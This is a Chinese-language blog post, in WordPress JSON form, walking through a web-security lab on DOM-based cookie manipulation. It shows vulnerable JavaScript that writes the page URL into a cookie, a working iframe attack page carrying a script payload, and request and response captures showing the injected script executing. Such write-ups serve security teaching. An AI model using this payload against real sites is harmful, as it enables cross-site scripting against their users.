{"id":1259,"date":"2023-02-21T19:43:00","date_gmt":"2023-02-21T11:43:00","guid":{"rendered":"https:\/\/systw.net\/note\/?p=1259"},"modified":"2024-03-16T00:38:48","modified_gmt":"2024-03-15T16:38:48","slug":"dom-xss-with-cookie","status":"publish","type":"post","link":"https:\/\/systw.net\/note\/archives\/1259","title":{"rendered":"DOM XSS to cookie"},"content":{"rendered":"\n<p class=\"wp-block-paragraph\"><\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u8b80\u53d6source\u6c92\u904e\u6ffe\u5c31\u628a\u4ed6\u5beb\u5230<code>document.cookie<\/code>\uff0c\u653b\u64ca\u8005\u53ef\u4ee5\u64cd\u4f5ccookie\u5167\u5bb9<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u8209\u4f8b\u5982\u4e0b\uff0c\u76ee\u6a19\u7db2\u7ad9\u7684cookie\u4f7f\u7528\u7684\u00a0<code>lastViewedProduct<\/code>\uff0c\u6703\u5132\u5b58\u4f7f\u7528\u8005\u9020\u8a2a\u7684\u6700\u5f8c\u4e00\u500b\u7522\u54c1\u9801\u9762\u7684URL<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>############## request ##############\nGET \/product?productId=1 HTTP\/1.1\n...omit...\nCookie: session=Vuaht7bMOlVnNwOHnHbiAUy6qsanFGBk; <mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-red-color\">lastViewedProduct=https:\/\/ace51f041ea0fde18050178d00580093.web-security-academy.net\/product?productId=2<\/mark>\n\n############## response ##############\n...omit...\n&lt;a href='https:\/\/ace51f041ea0fde18050178d00580093.web-security-academy.net\/product?productId=2'>Last viewed product&lt;\/a>&lt;p>|&lt;\/p>\n...omit...<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">lastViewedProduct\u7684javascript\u8655\u7406\u5982\u4e0b\uff0curl\u6703\u5b58\u9032lastViewedProduct<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>&lt;script>\r\n<mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-red-color\">document.cookie = 'lastViewedProduct=' + window.location <\/mark>+ '; SameSite=None; Secure'\r\n&lt;\/script>\r\n&lt;div class=\"is-linkback\">\r\n&lt;a href=\"\/\">Return to list&lt;\/a>\r\n&lt;\/div><\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\"><\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u6e96\u5099\u4e00\u500b\u653b\u64ca\u9801\u9762\u8b93\u53d7\u5bb3\u8005\u8a2a\u554f\uff0c\u5167\u5bb9\u5982\u4e0b<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>&lt;iframe src=\"https:\/\/ace51f041ea0fde18050178d00580093.web-security-academy.net\/product?productId=1&amp;'>&lt;script>alert(1)&lt;\/script>\" onload=\"if(!window.x)this.src='https:\/\/ace51f041ea0fde18050178d00580093.web-security-academy.net';window.x=1;\"><\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\u7576iframe\u7b2c\u4e00\u6b21\u8f09\u5165\u6642\uff0c\u700f\u89bd\u5668\u6703\u66ab\u6642\u958b\u555f\u60e1\u610fURL\uff0c\u7136\u5f8c\u5c07\u6b64URL\u4f4d\u7f6e\u5132\u5b58\u5728lastViewedProduct\u7684cookie<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>############## request ##############\nGET <mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-red-color\">\/product?productId=1&amp;%27%3E%3Cscript%3Ealert(1)%3C\/script%3E<\/mark> HTTP\/1.1\n...omit...\nCookie: session=Vuaht7bMOlVnNwOHnHbiAUy6qsanFGBk; lastViewedProduct=https:\/\/ace51f041ea0fde18050178d00580093.web-security-academy.net\/product?productId=1\n\n############## request ##############\n...omit...\n&lt;a href='https:\/\/ace51f041ea0fde18050178d00580093.web-security-academy.net\/product?productId=1'>Last viewed product&lt;\/a>&lt;p>|&lt;\/p>\n...omit...<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\u63a5\u8457onload \u4e8b\u4ef6\u8655\u7406\u7a0b\u5e8f\u78ba\u4fdd\u53d7\u5bb3\u8005\u7acb\u5373\u91cd\u5b9a\u5411\u5230\u4e3b\u9801\uff0c\u5982\u4e0b <\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>############## request ##############\nGET \/ HTTP\/1.1\n...omit...\nCookie: session=Vuaht7bMOlVnNwOHnHbiAUy6qsanFGBk; <mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-red-color\">lastViewedProduct=https:\/\/ace51f041ea0fde18050178d00580093.web-security-academy.net\/product?productId=1&amp;%27%3E%3Cscript%3Ealert(1)%3C\/script%3E<\/mark>\n\n############## request ##############\n...omit...\n<mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-red-color\">&lt;a href='https:\/\/ace51f041ea0fde18050178d00580093.web-security-academy.net\/product?productId=1&amp;'>&lt;script>alert(1)&lt;\/script>'>Last viewed product&lt;\/a><\/mark>&lt;p>|&lt;\/p>\n...omit...<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\u7531\u65bccookie\u4e2d\u7684lastViewedProduct\u503c\u6703\u8b8a\u6210\u8fd4\u56de\u5167\u5bb9\u7684\u4e00\u90e8\u4efd\uff0c\u56e0\u6b64\u4f7f\u7528\u8005\u7aef\u6703\u57f7\u884c<code>&lt;script>alert(1)&lt;\/script><\/code> <\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Lab: DOM-based cookie manipulation<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><\/p>\n","protected":false},"excerpt":{"rendered":"<p>\u8b80\u53d6source\u6c92\u904e\u6ffe\u5c31\u628a\u4ed6\u5beb\u5230document.cooki &#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"fifu_image_url":"","fifu_image_alt":"","_jetpack_memberships_contains_paid_content":false,"footnotes":"","jetpack_publicize_message":"","jetpack_publicize_feature_enabled":true,"jetpack_social_post_already_shared":false,"jetpack_social_options":{"image_generator_settings":{"template":"highway","default_image_id":0,"font":"","enabled":false},"version":2}},"categories":[40],"tags":[41],"class_list":["post-1259","post","type-post","status-publish","format-standard","hentry","category-clientside","tag-xss"],"jetpack_publicize_connections":[],"jetpack_featured_media_url":"","jetpack_sharing_enabled":true,"jetpack-related-posts":[{"id":1301,"url":"https:\/\/systw.net\/note\/archives\/1301","url_meta":{"origin":1259,"position":0},"title":"Race conditions","author":"raymond","date":"2024 \u5e74 2 \u6708 1 \u65e5","format":false,"excerpt":"Race conditions\u70ba\u5e38\u898b\u7684\u6f0f\u6d1e\uff0c\u8207\u696d\u52d9\u908f\u8f2f\u7f3a\u9677\u6709\u5bc6\u5207\u95dc\u4fc2\u3002\u7576\u7db2\u7ad9\u5728\u6c92\u6709\u8db3\u5920\u4fdd\u8b77\u63aa\u65bd\u7684\u60c5\u6cc1\u2026","rel":"","context":"\u5728\u300cLogic Vulnerabilities\u300d\u4e2d","block_context":{"text":"Logic Vulnerabilities","link":"https:\/\/systw.net\/note\/archives\/category\/hackerthreat\/logic-vulnerabilities"},"img":{"alt_text":"","src":"","width":0,"height":0},"classes":[]},{"id":1250,"url":"https:\/\/systw.net\/note\/archives\/1250","url_meta":{"origin":1259,"position":1},"title":"DOM XSS in third-party","author":"raymond","date":"2023 \u5e74 2 \u6708 18 \u65e5","format":false,"excerpt":"\u73fe\u4ee3 Web \u61c9\u7528\u7a0b\u5f0f\u901a\u5e38\u662f\u4f7f\u7528\u8a31\u591a\u7b2c\u4e09\u65b9\u7a0b\u5f0f\u5eab\u548c\u6846\u67b6\u5efa\u7acb\u7684\uff0c\u9019\u4e9b\u7a0b\u5f0f\u5eab\u548c\u6846\u67b6\u901a\u5e38\u70ba\u958b\u767c\u4eba\u54e1\u63d0\u4f9b\u9644\u52a0\u2026","rel":"","context":"\u5728\u300cClientSide\u300d\u4e2d","block_context":{"text":"ClientSide","link":"https:\/\/systw.net\/note\/archives\/category\/hackerthreat\/clientside"},"img":{"alt_text":"","src":"","width":0,"height":0},"classes":[]},{"id":1267,"url":"https:\/\/systw.net\/note\/archives\/1267","url_meta":{"origin":1259,"position":2},"title":"DOM XSS to websocket","author":"raymond","date":"2023 \u5e74 2 \u6708 21 \u65e5","format":false,"excerpt":"\u5982\u679c\u9801\u9762\u4ee5\u4e0d\u5b89\u5168\u7684\u65b9\u5f0f\u8655\u7406\u50b3\u5165\u7684 Web \u8a0a\u606f\uff0c\u4f8b\u5982\uff0c\u672a\u5728\u4e8b\u4ef6\u5075\u807d\u5668\u4e2d\u6b63\u78ba\u9a57\u8b49\u50b3\u5165\u8a0a\u606f\u7684\u4f86\u6e90\uff0c\u5247\u4e8b\u4ef6\u2026","rel":"","context":"\u5728\u300cClientSide\u300d\u4e2d","block_context":{"text":"ClientSide","link":"https:\/\/systw.net\/note\/archives\/category\/hackerthreat\/clientside"},"img":{"alt_text":"","src":"","width":0,"height":0},"classes":[]},{"id":1105,"url":"https:\/\/systw.net\/note\/archives\/1105","url_meta":{"origin":1259,"position":3},"title":"CORS","author":"raymond","date":"2023 \u5e74 1 \u6708 13 \u65e5","format":false,"excerpt":"CORS\uff08Cross-Origin Resource Sharing\uff09\u7684\u57fa\u672c\u539f\u7406\u662f\uff0c\u7db2\u7ad9\u4f3a\u670d\u5668\u7522\u751f\u8a2a\u2026","rel":"","context":"\u5728\u300cClientSide\u300d\u4e2d","block_context":{"text":"ClientSide","link":"https:\/\/systw.net\/note\/archives\/category\/hackerthreat\/clientside"},"img":{"alt_text":"","src":"","width":0,"height":0},"classes":[]},{"id":1179,"url":"https:\/\/systw.net\/note\/archives\/1179","url_meta":{"origin":1259,"position":4},"title":"Request Smuggling Attack","author":"raymond","date":"2023 \u5e74 2 \u6708 6 \u65e5","format":false,"excerpt":"\u95dc\u65bc\u8acb\u6c42\u8d70\u79c1\u7684\u4ecb\u7d39\u53ef\u53c3\u8003 https:\/\/systw.net\/note\/archives\/1172 \u2026","rel":"","context":"\u5728\u300cOperations\u300d\u4e2d","block_context":{"text":"Operations","link":"https:\/\/systw.net\/note\/archives\/category\/hackerthreat\/operations"},"img":{"alt_text":"","src":"","width":0,"height":0},"classes":[]},{"id":1284,"url":"https:\/\/systw.net\/note\/archives\/1284","url_meta":{"origin":1259,"position":5},"title":"CSRF bypass SameSite Lax","author":"raymond","date":"2023 \u5e74 2 \u6708 23 \u65e5","format":false,"excerpt":"SameSite\uff1dLax \u8868\u793a\u700f\u89bd\u5668\u53ea\u5728\u4ee5\u4e0b2\u7a2e\u60c5\u6cc1\u624d\u6703\u5728\u8de8\u7db2\u7ad9\u8acb\u6c42\u4e2d\u50b3\u9001 cookie \uff0c\u800c\u4e14\u5927\u90e8\u2026","rel":"","context":"\u5728\u300cClientSide\u300d\u4e2d","block_context":{"text":"ClientSide","link":"https:\/\/systw.net\/note\/archives\/category\/hackerthreat\/clientside"},"img":{"alt_text":"","src":"","width":0,"height":0},"classes":[]}],"_links":{"self":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/posts\/1259","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/comments?post=1259"}],"version-history":[{"count":0,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/posts\/1259\/revisions"}],"wp:attachment":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/media?parent=1259"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/categories?post=1259"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/tags?post=1259"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}